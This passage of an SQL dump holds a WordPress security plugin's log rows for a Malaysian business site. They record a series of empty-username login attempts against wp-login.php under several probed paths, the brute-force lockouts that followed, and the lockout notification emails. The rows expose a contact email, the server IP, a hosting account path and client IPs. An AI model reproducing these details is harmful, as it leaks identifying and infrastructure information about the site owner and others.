Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY22ViJ7D9Gn7wDPh8negAAAM4\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"185.166.131.146\";s:11:\"REMOTE_PORT\";s:5:\"56262\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY22ViJ7D9Gn7wDPh8negAAAM4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076953.4628\";s:12:\"REQUEST_TIME\";s:10:\"1569076953\";}}','notice','2019-09-21 14:42:34','2019-09-21 14:42:33',18163176,19654544,'https://bintara.com.my/wp/wp-login.php',1,0,'185.166.131.146'),(26347,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:42:33\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:42:33\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:42:33\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:42:33\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:42:34','2019-09-21 14:42:33',18247128,19654544,'https://bintara.com.my/wp/wp-login.php',1,0,'185.166.131.146'),(26348,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:42:34','2019-09-21 14:42:33',18454112,19654544,'https://bintara.com.my/wp/wp-login.php',1,0,'185.166.131.146'),(26349,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY2-jDrcQxTmGrCWuaVsgAAAdY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"35.240.189.61\";s:11:\"REMOTE_PORT\";s:5:\"10672\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY2-jDrcQxTmGrCWuaVsgAAAdY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076990.6789\";s:12:\"REQUEST_TIME\";s:10:\"1569076990\";}}','notice','2019-09-21 14:43:11','2019-09-21 14:43:11',18163400,19652320,'https://bintara.com.my/wordpress/wp-login.php',1,0,'35.240.189.61'),(26350,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:43:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:43:11\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:43:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:43:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:43:11','2019-09-21 14:43:11',18248096,19652320,'https://bintara.com.my/wordpress/wp-login.php',1,0,'35.240.189.61'),(26351,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:43:11','2019-09-21 14:43:11',18454960,19652320,'https://bintara.com.my/wordpress/wp-login.php',1,0,'35.240.189.61'),(26352,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY3DrfBTP0kPOVnb8jyfAAAAFI\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"45.118.145.84\";s:11:\"REMOTE_PORT\";s:5:\"48810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY3DrfBTP0kPOVnb8jyfAAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077006.2842\";s:12:\"REQUEST_TIME\";s:10:\"1569077006\";}}','notice','2019-09-21 14:43:27','2019-09-21 14:43:26',18162144,19649680,'https://bintara.com.my/test/wp-login.php',1,0,'45.118.145.84'),(26353,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:43:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:43:26\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:43:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:43:26\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:43:27','2019-09-21 14:43:26',18246896,19649680,'https://bintara.com.my/test/wp-login.php',1,0,'45.118.145.84'),(26354,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:43:27','2019-09-21 14:43:26',18453472,19649680,'https://bintara.com.my/test/wp-login.php',1,0,'45.118.145.84'),(26355,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY3GXkXpgmG5P@iB8lA8QAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.127.108\";s:11:\"REMOTE_PORT\";s:5:\"47492\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY3GXkXpgmG5P@iB8lA8QAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077017.1783\";s:12:\"REQUEST_TIME\";s:10:\"1569077017\";}}','notice','2019-09-21 14:43:38','2019-09-21 14:43:37',18161712,19650928,'https://bintara.com.my/2019/wp-login.php',1,0,'104.238.127.108'),(26356,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:43:37\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:43:37\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:43:37\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:43:37\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:43:38','2019-09-21 14:43:37',18246512,19650928,'https://bintara.com.my/2019/wp-login.php',1,0,'104.238.127.108'),(26357,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:43:38','2019-09-21 14:43:37',18454200,19650928,'https://bintara.com.my/2019/wp-login.php',1,0,'104.238.127.108'),(26358,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY3JnkXpgmG5P@iB8lA9QAAAIU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.177.25\";s:11:\"REMOTE_PORT\";s:5:\"53680\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY3JnkXpgmG5P@iB8lA9QAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077031.0049\";s:12:\"REQUEST_TIME\";s:10:\"1569077031\";}}','notice','2019-09-21 14:43:52','2019-09-21 14:43:51',18162144,19649680,'https://bintara.com.my/blog/wp-login.php',1,0,'165.22.177.25'),(26359,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:43:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:43:51\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:43:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:43:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:43:52','2019-09-21 14:43:51',18246896,19649680,'https://bintara.com.my/blog/wp-login.php',1,0,'165.22.177.25'),(26360,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:43:52','2019-09-21 14:43:51',18453472,19649680,'https://bintara.com.my/blog/wp-login.php',1,0,'165.22.177.25'),(26361,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY3LViJ7D9Gn7wDPh8njAAAAM8\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.73.216\";s:11:\"REMOTE_PORT\";s:5:\"54082\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY3LViJ7D9Gn7wDPh8njAAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077037.2755\";s:12:\"REQUEST_TIME\";s:10:\"1569077037\";}}','notice','2019-09-21 14:43:58','2019-09-21 14:43:57',18162680,19651616,'https://bintara.com.my/wp/wp-login.php',1,0,'104.238.73.216'),(26362,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:43:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:43:57\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:43:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:43:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:43:58','2019-09-21 14:43:57',18247584,19651616,'https://bintara.com.my/wp/wp-login.php',1,0,'104.238.73.216'),(26363,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:43:58','2019-09-21 14:43:57',18454296,19651616,'https://bintara.com.my/wp/wp-login.php',1,0,'104.238.73.216'),(26364,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 